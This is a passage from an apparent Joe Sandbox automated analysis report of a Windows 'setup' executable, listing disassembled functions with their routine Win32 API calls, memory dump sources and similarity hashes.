                                                                                                                          • Instruction Fuzzy Hash: 8A118EB1210600AFDB359F10DC5DB5ABBB5FB50701F118A19E146565A0C7B1AD84DBA1
                                                                                                                          Function 00C3C804 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 00C3C81A
                                                                                                                          • GetParent.USER32(00000000), ref: 00C3C828
                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00C3C849
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C3C862
                                                                                                                            • Part of subcall function 00C3D666: GetWindowLongW.USER32(?,000000F0), ref: 00C3D681
                                                                                                                            • Part of subcall function 00C3D666: GetClassNameW.USER32(?,?,0000000A), ref: 00C3D696
                                                                                                                            • Part of subcall function 00C3D666: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00C3D6AD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClassClientCompareEnabledFromLongNameParentPointScreenString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3223446165-0
                                                                                                                          • Opcode ID: cb25f906a2970e25681de02870d5adb8c258244601e2c56308d6737c9b9e314d
                                                                                                                          • Instruction ID: 5188852f5f91fe5e1195725eb64c9d68bf5319e61a0d5df601fc1393e44925e3
                                                                                                                          • Opcode Fuzzy Hash: cb25f906a2970e25681de02870d5adb8c258244601e2c56308d6737c9b9e314d
                                                                                                                          • Instruction Fuzzy Hash: 6601D676610614BF8B029BA99C48EAEBBBDEF89740F014066F915E3250EB30DF009761
                                                                                                                          Function 00C3064A Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00C30654
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 00C30661
                                                                                                                            • Part of subcall function 00C3064A: GetWindow.USER32(00000000,00000002), ref: 00C306B0
                                                                                                                          • GetTopWindow.USER32(?), ref: 00C30695
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 369458955-0
                                                                                                                          • Opcode ID: faf237ca9f06f06aededa0ad468a45225aa9823840cfe38bc0e5beee20548e7a
                                                                                                                          • Instruction ID: 05bbba2ddd4135e5179c8a1a18590cc792d11fac619296813dfcac492e0413ae
                                                                                                                          • Opcode Fuzzy Hash: faf237ca9f06f06aededa0ad468a45225aa9823840cfe38bc0e5beee20548e7a
                                                                                                                          • Instruction Fuzzy Hash: 68016273011725BBDF222F628C2AB9E3B38AF543A0F214015FC259401AD731CF309AD5
                                                                                                                          Function 00C1E3B2 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,?), ref: 00C1E3D9
                                                                                                                          • SendMessageW.USER32(?,00000402,?,00000000), ref: 00C1E3F1
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C1E3FD
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C1E405
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$InvalidateRectUpdateWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 464723990-0
                                                                                                                          • Opcode ID: 04fb26a57ccbba1f4e967f70fb57bcb63e8435746cdd66a2e464500be9dcb0e5
                                                                                                                          • Instruction ID: a675e1569e7b9d98f63d0d3aa13ad12c9d859f956e376f28dec15afd56da7d1e
                                                                                                                          • Opcode Fuzzy Hash: 04fb26a57ccbba1f4e967f70fb57bcb63e8435746cdd66a2e464500be9dcb0e5
                                                                                                                          • Instruction Fuzzy Hash: 5F01A431640200FFEB305F51DC4EF8ABB69EB45B10F10812AFF59AA1E5D6B22810DB54
                                                                                                                          Function 00C798D7 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00C79A9C,00000000,?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001), ref: 00C798ED
                                                                                                                          • GetLastError.KERNEL32(?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000,?,00C79A9C,?,00000030), ref: 00C798F7
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C798FE
                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00C870E2,00C79A9C,00C79A9C,00000104,?,?,00000030,?,00000001,00000000), ref: 00C79928
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1391015842-0
                                                                                                                          • Opcode ID: cbd8ea43b98ca4b8867f818925ed01127ccb19eacae3580b763120e9ed49ee6d
                                                                                                                          • Instruction ID: f77ff30d1ac61ba48d9d63e2022a92821a57aba741ea16472a779c417adae7cd
                                                                                                                          • Opcode Fuzzy Hash: cbd8ea43b98ca4b8867f818925ed01127ccb19eacae3580b763120e9ed49ee6d
                                                                                                                          • Instruction Fuzzy Hash: B0F0EC36200205AFEB215F66DC09F6BBBA9FF55361B14C429F66EC2560DB31E810DB50
                                                                                                                          Function 00C799A3 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFullPathNameW.KERNEL32(?,FF531275,F6855959,00000000,?,00000000,?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?), ref: 00C799B9
                                                                                                                          • GetLastError.KERNEL32(?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?,00000000), ref: 00C799C3
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C799CA
                                                                                                                          • GetFullPathNameW.KERNEL32(?,FF531275,F6855959,00000000,FF531276,?,00C7984A,?,?,?,00C796D5,?,?,00C6A29E,?,00000000), ref: 00C799F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1391015842-0
                                                                                                                          • Opcode ID: 307a690fb4c91875277667495e5b16043eaf41cc454e00a0b73cc4996388bbef
                                                                                                                          • Instruction ID: 35a4d11b26570494c50ffb1ce1e62c05dd88a5e26b2b4a4860ba01cd309a7c76
                                                                                                                          • Opcode Fuzzy Hash: 307a690fb4c91875277667495e5b16043eaf41cc454e00a0b73cc4996388bbef
                                                                                                                          • Instruction Fuzzy Hash: 50F04436604200AFDB315B66DC09F6BBBA9FF44361710C82AF66EC3060DB31E8109B50
                                                                                                                          Function 00C7993D Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00C79A9C,00000000,?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000), ref: 00C79953
                                                                                                                          • GetLastError.KERNEL32(?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000,?,00C79A9C,?,00000030,00000104), ref: 00C7995D
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C79964
                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00C87154,00C79A9C,00000104,?,?,00000030,?,00000001,00000000,00000000), ref: 00C7998E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1391015842-0
                                                                                                                          • Opcode ID: b8d3e141cb6a3a11c15da21cd4827276daa05603c496842338fa7ec9773b606d
                                                                                                                          • Instruction ID: f9c0fa02ed65279b2a9ff65c7ff18fb1c3c737dc03b2c5940fb0b7725da08f2d
                                                                                                                          • Opcode Fuzzy Hash: b8d3e141cb6a3a11c15da21cd4827276daa05603c496842338fa7ec9773b606d
                                                                                                                          • Instruction Fuzzy Hash: 5DF0EC36200205AFEB215B66DC09F6BBBA9FF84761710C42DF66EC2560DB31E810DB50
                                                                                                                          Function 00C3549C Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Parent$Focus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 384096180-0
                                                                                                                          • Opcode ID: bc0dd8b15695ad3d5d054a51cde2fd5097b3466b6d79a494467ba65290c24731
                                                                                                                          • Instruction ID: 134e418800c671a497b4ddbe110d63cced9e58651f70813e26fe8f2269ac4656
                                                                                                                          • Opcode Fuzzy Hash: bc0dd8b15695ad3d5d054a51cde2fd5097b3466b6d79a494467ba65290c24731
                                                                                                                          • Instruction Fuzzy Hash: FAF03133630A009FCE162B70AD1DA2E77BABF84311B15046AF58683172DF34DC019B90
                                                                                                                          Function 00C1969E Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C1965A
                                                                                                                            • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000), ref: 00C1965E
                                                                                                                            • Part of subcall function 00C195FB: VerSetConditionMask.KERNEL32(00000000), ref: 00C19662
                                                                                                                            • Part of subcall function 00C195FB: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00C19685
                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00C196BD
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00C196C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMask$Process$CurrentInfoOpenTokenVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4086206417-0
                                                                                                                          • Opcode ID: 0895f8f22e90f1cb4a0b6fe74d98e53287fb3306f1f4b880eb43a67941d62361
                                                                                                                          • Instruction ID: b7902c13b2b60e641b57d4597bf0b20484d436e8dfa48dffcb3011b80c258070
                                                                                                                          • Opcode Fuzzy Hash: 0895f8f22e90f1cb4a0b6fe74d98e53287fb3306f1f4b880eb43a67941d62361
                                                                                                                          • Instruction Fuzzy Hash: 3FF01231A10208FBDF10DB90DD4ABED77BCFB0179AF104095A511E60D1D7748B59AB65
                                                                                                                          Function 00C0908C Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090A9
                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090BB
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090C6
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00C090D4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFileHandle$CreateSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4148174661-0
                                                                                                                          • Opcode ID: fb5dd5067658d9fb275c4008ea00f3d5445687e0bd66d74b6ae2ca6c602b476d
                                                                                                                          • Instruction ID: c77c16b59f97b87e52b17bc7c1c6f4a27c4943c753610468d3cd97e0449f354b
                                                                                                                          • Opcode Fuzzy Hash: fb5dd5067658d9fb275c4008ea00f3d5445687e0bd66d74b6ae2ca6c602b476d
                                                                                                                          • Instruction Fuzzy Hash: 29F03A71611214BFEB149BB4DC09FBE7AACFB09764F100755B971E21E1D671EE0186A0
                                                                                                                          Function 00C32AF1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2353593579-0
                                                                                                                          • Opcode ID: a7f5911ac0aa097cfbc46314b492061c0c48a02d5b80f31be4c338e15dfe7f35
                                                                                                                          • Instruction ID: 9635377f86ce33d7a547acdbb91f5005d094a6fdbef7bffadf0effe0984075eb
                                                                                                                          • Opcode Fuzzy Hash: a7f5911ac0aa097cfbc46314b492061c0c48a02d5b80f31be4c338e15dfe7f35
                                                                                                                          • Instruction Fuzzy Hash: C4F0E23200021ABBCF225F90DC08FDE7B29AF09355F018011FA16640A1C7368A62EBA5
                                                                                                                          Function 00C917ED Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000), ref: 00C91804
                                                                                                                          • GetLastError.KERNEL32(?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?,?,?,00C8B6F9,00000000), ref: 00C91810
                                                                                                                            • Part of subcall function 00C917D6: CloseHandle.KERNEL32(FFFFFFFE,00C91820,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?,?), ref: 00C917E6
                                                                                                                          • ___initconout.LIBCMT ref: 00C91820
                                                                                                                            • Part of subcall function 00C91798: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C917C7,00C90655,?,?,00C8B11F,?,00000000,00000000,?), ref: 00C917AB
                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C90668,00000000,00000001,00000000,?,?,00C8B11F,?,00000000,00000000,?), ref: 00C91835
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744216297-0
                                                                                                                          • Opcode ID: 93b07ad35fabc14291bd4e16e8d01fb6ebf55af2e5f51f09ba0cd741a4eca5e6
                                                                                                                          • Instruction ID: 694619a04f23e9123e9425e4dbfbe331aa32fd9eabe086c42427f4905b06e573
                                                                                                                          • Opcode Fuzzy Hash: 93b07ad35fabc14291bd4e16e8d01fb6ebf55af2e5f51f09ba0cd741a4eca5e6
                                                                                                                          • Instruction Fuzzy Hash: 7AF0C93650025ABBCF222FE6DC0DF9E7F66FB083A1F594115FE2995570C6328960EB90
                                                                                                                          Function 00C47A2E Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C47A40
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C47A4F
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00C47A58
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00C47A65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2933794660-0
                                                                                                                          • Opcode ID: d22d32b5459373fd8a09955d9f49d43d0745fb3b4b54f9680d6c876a3490a082
                                                                                                                          • Instruction ID: 884e13d0cdb50ea09de3a8bf814937eeab685c24704a48f531b6a7cad839ee02
                                                                                                                          • Opcode Fuzzy Hash: d22d32b5459373fd8a09955d9f49d43d0745fb3b4b54f9680d6c876a3490a082
                                                                                                                          • Instruction Fuzzy Hash: 4AF06274D1020DEBCF00DBB4DA49A9EBBF8FF1C304B914996A412E7150E734AB44DB50
                                                                                                                          Function 00C24D9B Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00C24DA7
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C24DB6
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C24DC4
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C24DD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1035833867-0
                                                                                                                          • Opcode ID: 3e28b43493185bac65bc55f23d7b080b25285df12a6dac78added3e5532ff0df
                                                                                                                          • Instruction ID: deb0fb0939197db367cce00cadb2ca4f649724d218faea124fbf4c846d53d194
